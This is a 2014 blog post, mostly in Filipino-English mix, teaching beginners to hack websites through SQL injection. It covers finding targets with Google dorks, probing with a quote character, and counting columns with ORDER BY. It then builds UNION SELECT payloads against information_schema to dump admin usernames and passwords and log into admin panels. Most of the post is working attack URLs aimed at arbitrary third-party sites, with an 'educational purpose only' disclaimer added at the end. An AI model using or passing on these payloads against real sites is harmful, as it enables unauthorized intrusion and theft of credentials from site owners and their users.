Wednesday 19 March 2014



Walang magawa :p hahaha

I will teach you how to hack a vulnerable site is a simplest way :3
using SQL Injection.. <3
You can do this :
ByPassing Logins
Accessing secret data
Modifying contents of website ( mostly gingawa ng mga hackers )
Shutting down the My SQL server (like a DDOS)

first you need a browser. ako recommended ko ung Mozilla firefox.

*Open mo browser(mozilla firefox) mo then go here https://addons.mozilla.org/en-US/firefox/addon/hackbar/ (install it)
(req. to restart your browser)

*tapos find a google dork
HOW?
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
(type nyo sa google search nyo)

*just pick one site. then go sa site na target mo at open mo ung HACK BAR nasa addons ng mozilla firefox.makikita mo may bagong bar under sa URL bar dun mo to itype at gagawin ang pag hack.

*after nyan try natin if vulnerability sya or hackable
HOW?
lagyan lang sa dulo ng (')

http://www.victimsite.com/index.php?id=2
---------------------------------------------
http://www.victimsite.com/index.php?id=2'

*if may error na lalabas na ganito
(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) or anything na tulad ng ganyan. meaning vulnerable at pede mo i hack un.

*after that remove (') at dagdagan nyo lang ng  (order by) tapos ascending ung number like this : until mag ka error na sya :3 

http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (error)

*then sunod lagyan nyo ng (-) ung sa (id=-2) at dagdagan nyo ng
 (union select) hangang sa last na walang error
 (so sa 3 ung last na no error.above) like this:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3--

*Then makikita nyo ung vulnerable columns jan. may number un .
ex. number 2

*Now lets find the database,version,user ng site na target natin. diba number 2 ung example na lumabas?? so dun natin iinject ung version(),database(),user() (isulat sa papel/notepad para di malimutan) para malaman natin .(dagdagan nyo ng id=-2 and 1=2 union select,gayahin lang sa baba) 
HOW?

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,version(),3--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,database(),3--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,user(),3--

*If the Database version is 5 or above its ok but If the version is 4.x, then you have to guess the table names (blind sql injection attack).

*Then after knowing database,user,version next step is to find the table name of the database. Replace the 2 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
ex.
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

*next lalabas dun mga names ng table. mostly ADMIN ung name na need natin. then if example may admin dun. un pipiliin natin pasukin :3

*Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--"(ung nasa after nitong step) with "FROM information_schema.columns WHERE table_name=mysqlchar--
it should be like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=mysqlchar--

*then  We have to convert the table name to MySql CHAR() string
how?
sa HACK BAR ng mozilla firefox makikita mo ung SQL dun click it then may SQL(pinakauna)then  MySql CHAR().
then may pop up un dun mo itype ung name ng column example natin ung ADMIN. (lalabas ung code dun pag ok mo :3) at ipalit mo dun sa mysqlchar--

example ng code      CHAR(97, 100, 109, 105, ***)

*after nun copy and paste the code at the end of the url instead of the "mysqlchar" (remember wag i remove ung --)
it should be like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, ***)--

*pag ok mo nyan lalabas ang mga name. 
example ay mga to:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

*Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
then replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, ***)" with the "from table_name(ADMIN)"

{If the above query displays the 'column is not found' error, then try another column name from the list.}

example:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(admin_id,0x3a,admin_password),3 from admin--

LALABAS NA PO UNG ADMIN USERNAME AT ADMIN PASSWORD <3 haha. then panu gamitin ?

HANAP PO NATIN UNG ADMIN PANEL NYA: 

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

pag nahanap nyo na po lalabas na dun ung log in page. therefore  pede kana pumasok gamit ung ADMIN USERNAME AT ADMIN PASSWORD :3
ENJOY..



Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.  If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.

In this article, i just explained how to attack SQL injection vulnerable site in a n00b(newbie) way. If you want to become PenTester, you must know how these attacks works. In my next article, i will explain the SQL Injection depth.


-Credits to ZePh of SYMBIANIZE 2k6 >.<

Epekto ng walang magawa hahahaaha 



Posted by at No comments:
Subscribe to: Posts (Atom)